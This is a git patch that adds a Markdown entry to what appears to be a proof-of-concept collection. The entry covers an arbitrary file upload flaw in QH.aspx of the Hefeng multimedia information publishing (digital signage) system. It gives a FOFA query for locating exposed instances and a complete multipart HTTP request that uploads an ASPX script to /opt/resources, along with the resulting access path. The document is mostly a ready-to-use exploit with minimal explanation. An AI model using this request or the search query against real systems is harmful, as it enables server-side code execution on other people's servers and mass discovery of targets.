From 2ad0d7d57dceeee655e6de4b77f01dc33b2d35a3 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 2 May 2024 14:17:23 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E5=92=8C=E4=B8=B0=E5=A4=9A=E5=AA=92?=
 =?UTF-8?q?=E4=BD=93=E4=BF=A1=E6=81=AF=E5=8F=91=E5=B8=83=E7=B3=BB=E7=BB=9F?=
 =?UTF-8?q?QH.aspx=E5=AD=98=E5=9C=A8=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...多媒体信息发布系统QH.aspx存在文件上传漏洞.md | 34 +++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 和丰多媒体信息发布系统QH.aspx存在文件上传漏洞.md

diff --git a/和丰多媒体信息发布系统QH.aspx存在文件上传漏洞.md b/和丰多媒体信息发布系统QH.aspx存在文件上传漏洞.md
new file mode 100644
index 0000000..6b2c48c
--- /dev/null
+++ b/和丰多媒体信息发布系统QH.aspx存在文件上传漏洞.md
@@ -0,0 +1,34 @@
+## 和丰多媒体信息发布系统QH.aspx存在文件上传漏洞
+
+## fofa
+```
+app="和丰山海-数字标牌"
+```
+
+## poc
+```
+POST /QH.aspx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhbcZX7o0Hw19h3kr
+
+------WebKitFormBoundaryhbcZX7o0Hw19h3kr
+Content-Disposition: form-data; name="fileToUpload"; filename="qwe.aspx"
+Content-Type: application/octet-stream
+
+<% response.write("hello") %>
+------WebKitFormBoundaryhbcZX7o0Hw19h3kr
+Content-Disposition: form-data; name="action"
+
+upload
+------WebKitFormBoundaryhbcZX7o0Hw19h3kr
+Content-Disposition: form-data; name="responderId"
+
+ResourceNewResponder
+------WebKitFormBoundaryhbcZX7o0Hw19h3kr
+Content-Disposition: form-data; name="remotePath"
+
+/opt/resources
+------WebKitFormBoundaryhbcZX7o0Hw19h3kr--
+```
+文件上传路径`http://ip/opt/resources/qwe.aspx`